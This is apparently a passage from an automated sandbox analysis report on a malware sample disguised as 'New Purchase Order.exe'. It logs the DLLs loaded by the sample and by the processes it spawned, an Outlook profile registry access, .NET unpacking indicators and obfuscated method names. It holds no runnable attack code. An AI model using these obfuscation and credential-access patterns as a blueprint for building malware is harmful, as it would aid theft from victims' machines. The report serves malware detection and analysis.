            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SguBfrlSDIFxPr.exe, 00000010.00000000.2305918162.000000000093E000.00000002.00000001.01000000.0000000D.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000000.2457069327.000000000093E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: New Purchase Order.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: hbaiQWstL.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs.Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs.Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.cs.Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 17.2.setupugc.exe.3c5cd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0041A857 push DD2CA9E8h; retf 9_2_0041A85D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0040D20D push esp; ret 9_2_0040D258
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_004032C0 push eax; ret 9_2_004032C2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0040ABA3 push esi; ret 9_2_0040ABA4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_00408433 push eax; iretd 9_2_00408434
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_00417D95 push ds; ret 9_2_00417D97
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_00418EE1 pushfd ; ret 9_2_00418F06
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0041A68C push 00000063h; retf 9_2_0041A68E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A225F pushad ; ret 9_2_017A27F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A27FA pushad ; ret 9_2_017A27F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D09AD push ecx; mov dword ptr [esp], ecx9_2_017D09B6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A283D push eax; iretd 9_2_017A2858
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017A1328 push eax; iretd 9_2_017A1369
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017FC54D pushfd ; ret 14_2_017FC54E
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017FC9D7 push edi; ret 14_2_017FC9D9
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_017B09AD push ecx; mov dword ptr [esp], ecx14_2_017B09B6
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01781FEC push eax; iretd 14_2_01781FED
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_01807E99 push ecx; ret 14_2_01807EAC
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeCode function: 14_2_0042DA0C push esi; retf 14_2_0042DA2F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036609AD push ecx; mov dword ptr [esp], ecx17_2_036609B6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D003F2 push ss; iretd 17_2_00D003F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D003BE push ebp; iretd 17_2_00D003CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CFC36D push edx; iretd 17_2_00CFC36E
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF24EA push ebx; retf 17_2_00CF24EB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D00400 push ds; retf 17_2_00D00403
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF4AD2 push ds; ret 17_2_00CF4AD4
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CE5170 push eax; iretd 17_2_00CE5171
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF73C9 push 00000063h; retf 17_2_00CF73CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CF7594 push DD2CA9E8h; retf 17_2_00CF759A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CE78E0 push esi; ret 17_2_00CE78E1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00CFD8B8 push edi; iretd 17_2_00CFD8BA
            Source: New Purchase Order.exeStatic PE information: section name: .text entropy: 7.866114778015551
            Source: hbaiQWstL.exe.0.drStatic PE information: section name: .text entropy: 7.866114778015551
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, HHhsU2qAYMPla5aIDYc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, q3VKdmLQewPeuA4N72.csHigh entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, ckj7u2pGAaf8INieFh.csHigh entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, JwTBk9IPoaxFjSc6xW.csHigh entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SRCqlIJcgwJZFuosxj.csHigh entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, VgQkbRn23bHy4GHxvj.csHigh entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, OEhUlQ281Owx1tmo6p.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, OYyLu3T6BDUCTl9P9j.csHigh entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SWK57FcddZRYqoRlo9.csHigh entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, IWOHEthbFFReLStnZY.csHigh entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, x9Oa4nuLVFFG6CaiRN.csHigh entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, nLS36HZfw7qLEHMs2t.csHigh entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, DwiqYnyOeNkuOV9dDN.csHigh entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, r6uWPH54nyDsQ5R73a.csHigh entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.csHigh entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.csHigh entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, raAPqr4eix1YefVSjY.csHigh entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, ArHCtDC5S2Y8AYEOBV.csHigh entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, EQ0ZWrk6M5lhuWnFO8.csHigh entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, T0eQ8UBALokRnXqfN7.csHigh entropy of concatenated method names: 'zox36wWca8', 'K7s373ssvB', 'iK6bPctl5v', 'QkSb8d5ZWr', 'uOcbDGcQUo', 'qakbWiZWqO', 'n5ObfuPPya', 'JsmbmlFiik', 'GvPbaF3V2O', 'Eq4bU4aIDN'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, HHhsU2qAYMPla5aIDYc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, q3VKdmLQewPeuA4N72.csHigh entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, ckj7u2pGAaf8INieFh.csHigh entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, JwTBk9IPoaxFjSc6xW.csHigh entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SRCqlIJcgwJZFuosxj.csHigh entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, VgQkbRn23bHy4GHxvj.csHigh entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, OEhUlQ281Owx1tmo6p.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, OYyLu3T6BDUCTl9P9j.csHigh entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, SWK57FcddZRYqoRlo9.csHigh entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, IWOHEthbFFReLStnZY.csHigh entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, x9Oa4nuLVFFG6CaiRN.csHigh entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, nLS36HZfw7qLEHMs2t.csHigh entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, DwiqYnyOeNkuOV9dDN.csHigh entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, r6uWPH54nyDsQ5R73a.csHigh entropy of concatenated method names: 'YCdt6iEWZ', 'aZsR1FQbJ', 'WIOnuyavp', 'LS1749BMF', 'hMUI1ONRh', 'LA0EQtfwG', 'kdK3u8pYespUNiBC9C', 'C7rY78IwVHIZY7SvsA', 'bOG9gUahH', 'Erh5g9lAl'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.csHigh entropy of concatenated method names: 'Ri7ldbj7bu', 'uYEluATJ80', 'GvXlA4jcVq', 'rO5lbEwFyP', 'njSl3ji514', 'GUFlxTtUhh', 'EWJlyTa0Ms', 'Cs7leRGqQa', 'fx3lpmMoy2', 'Ya1lrMAP5e'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, DFTR3Jqlo5F4DVFu9Nd.csHigh entropy of concatenated method names: 'KMtJMGHXNA', 'o6XJTkEG9D', 'WC1JtM1X1E', 'XxkJReVdMc', 'I8GJ6tKZq5', 'qgjJncRS6Z', 'ixHJ7mbIN7', 'v6TJQMXYFf', 'yWKJIBMn8L', 'x1kJExNhG2'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, raAPqr4eix1YefVSjY.csHigh entropy of concatenated method names: 'aTJJHCYcP9', 'ScIJlBrEey', 'yNrJZ15qb0', 'oG8JujvD0w', 'IlZJACGQcY', 'QDSJ3rTUT2', 'uPJJx9f1rU', 'Yh39NdJQsK', 'bYq9XxRvKm', 'nin9orc5C7'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, ArHCtDC5S2Y8AYEOBV.csHigh entropy of concatenated method names: 'cmF9uy7aL5', 'u8Q9ApmVa9', 'A6k9bF20hY', 'nrv93XVjdX', 'N0U9x3uByp', 'aMF9ykgWa3', 'msl9ePZcts', 'tkf9pTL473', 'Q9e9rV7pEy', 'aQ89veYNHL'
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, EQ0ZWrk6M5lhuWnFO8.csHigh entropy of concatenated method names: 'Dispose', 'So0HofxoyH', 'E2USYmB9AG', 'n0bkk4OOpw', 'i42HKSUB0m', 'jBfHzCjwa5', 'ProcessDialogKey', 'STASB4NN9X', 'FK1SHG0Pvm', 'zjJSSeGFR1'
